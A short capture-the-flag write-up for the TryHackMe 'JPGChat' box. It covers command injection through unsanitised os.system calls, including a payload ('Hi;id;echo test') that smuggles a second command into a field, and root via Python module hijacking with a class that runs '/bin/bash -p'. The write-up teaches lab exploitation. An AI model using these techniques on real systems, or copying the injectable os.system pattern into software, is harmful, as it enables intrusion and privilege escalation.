Initial foothold

After running our normal scan: `scanit $(boxip)` we get two ports open.

The custom chat program looks interesting, let’s netcat to it.

We get presented with a usage prompt. Let’s try the [REPORT] function first.

Hmm, interesting, Mozzie-jpg, let’s search for that git user to see the code as mentioned.
We find this repo: https://github.com/Mozzie-jpg/JPChat in there a single python file with two interesting lines of code.

Both look injectible.

os.system("bash -c 'echo %s > /opt/jpchat/logs/report.txt'" % your_name) os.system("bash -c 'echo %s >> /opt/jpchat/logs/report.txt'" % report_text)

I sent a random string for good measure, a command, then echo to complete the line as it is in the code, this might not be necessary but I do it just in case so I don’t break anything.

Hi;id;echo test

Here I tried one command on the name and another on the report, both worked.

User

We got command execution. Let’s get a shell.

Shell popped. We can grab user.txt flag.

Root

sudo -l Is the first thing I try.

We can do something with the PYTHONPATH environment variable, interesting.

Python module hijacking is explained here.

Creating a minimal class named compare:

class compare:
def Str(self, x, y,):
import os
os.system('/bin/bash -p')

We should get a root terminal when a string is compared.

So lets try:

Bingo.

thm writeup

Tryhackme – JPGChat

Initial foothold

User

Root